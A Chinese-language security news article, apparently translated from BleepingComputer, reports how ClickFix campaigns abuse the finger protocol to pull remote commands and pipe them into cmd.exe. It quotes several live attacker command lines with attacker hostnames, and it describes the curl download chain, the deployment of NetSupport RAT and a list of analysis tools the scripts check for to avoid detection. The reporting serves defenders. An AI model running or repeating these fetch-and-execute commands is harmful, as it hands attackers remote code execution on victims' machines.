Finger協議遭濫用 淪為 ClickFix 惡意軟件攻擊工具

有著數十年歷史的finger協議正重新活躍，威脅者借助這一協議獲取遠程指令，在Windows設備上執行惡意操作。

過去，人們通過Finger協議，在Unix與Linux系統中使用finger命令查詢本地及遠程用戶信息，該命令后續也被加入Windows系統。盡管目前仍受支持，但相較于數十年前的普及度，如今其使用率已大幅下降。

執行finger命令后，會返回用戶的基礎信息，包括登錄名、用戶名（若在/etc/passwd中設置）、主目錄、電話號碼、最后活躍時間及其他詳情。

手指命令輸出

近期，多起惡意攻擊活動開始利用Finger協議，疑似通過“ClickFix攻擊”獲取指令并在設備上執行。

這并非finger命令首次被如此濫用——早在2020年，研究人員就曾發出警告，指出該命令已被用作“ Living-off-the-Land Binary（ LOLBIN，合法系統工具濫用）”，用于下載惡意軟件并規避檢測。

finger命令遭惡意濫用

上月，網絡安全研究員分享了一個批處理文件。該文件執行后，會運行“finger root@finger.nateams[.]com”命令，從遠程finger服務器獲取指令，再通過管道符傳遞給cmd.exe在本地執行。

手指命令輸出

目前該服務器已無法訪問，但MalwareHunterTeam又發現了更多利用finger命令的惡意軟件樣本與攻擊活動。例如，Reddit平臺上有用戶近期發文警示，稱自己遭遇了一場偽裝成驗證碼驗證的ClickFix攻擊——攻擊者誘導其運行一條Windows命令，以“證明自己是人類”。

盡管目前該服務器已不再響應finger請求，但另一位Reddit用戶捕獲了此前的輸出結果。這類攻擊將Finger協議用作遠程腳本傳輸工具：通過運行“finger vke@finger.cloudmega[.]org”命令，將輸出結果通過管道符傳遞給Windows命令處理器cmd.exe。

這一操作會觸發獲取到的指令執行：創建隨機命名的路徑，將curl.exe復制為隨機文件名，通過重命名后的curl程序從cloudmega[.]org下載偽裝成PDF文件的壓縮包，并解壓出一個Python惡意軟件包。

偽裝成PDF的檔案內容

隨后，系統會通過“pythonw.exe __init__.py”命令執行該Python程序。最終執行的指令會向攻擊者的服務器回傳“執行成功”的確認信息，同時向用戶顯示偽造的“驗證你是人類”提示框。

目前尚不清楚該Python惡意軟件包的具體用途，但從一個關聯批處理文件可推斷，其應為一款信息竊取工具。

安全員還發現了另一項類似攻擊活動：通過“finger Kove2@api.metrics-strange.com | cmd”命令獲取并執行指令，操作流程與上述ClickFix攻擊幾乎一致。

finger命令的輸出

分析發現，這一攻擊手段更為成熟——指令會先檢測設備中是否存在惡意軟件研究常用工具，若發現則終止攻擊。這些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg及ProcessHacker。

若未檢測到惡意軟件分析工具，指令會下載偽裝成PDF的壓縮包并解壓。但與此前不同的是，該壓縮包中并非Python惡意軟件包，而是NetSupport Manager遠程訪問工具（RAT）安裝包。

NetSupport Manager RAT

隨后，指令會配置一個計劃任務，確保用戶登錄時自動啟動該遠程訪問惡意軟件。

目前來看，此類finger命令濫用活動似乎由單一威脅者發起，且主要通過ClickFix攻擊實施。但鑒于仍有用戶持續上當，相關攻擊活動需引起高度警惕。

對于防御方而言，阻止finger命令濫用的最佳方式是攔截流向TCP 79端口的出站流量——該端口是Finger協議用于連接守護進程的專用端口。

參考及來源：https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/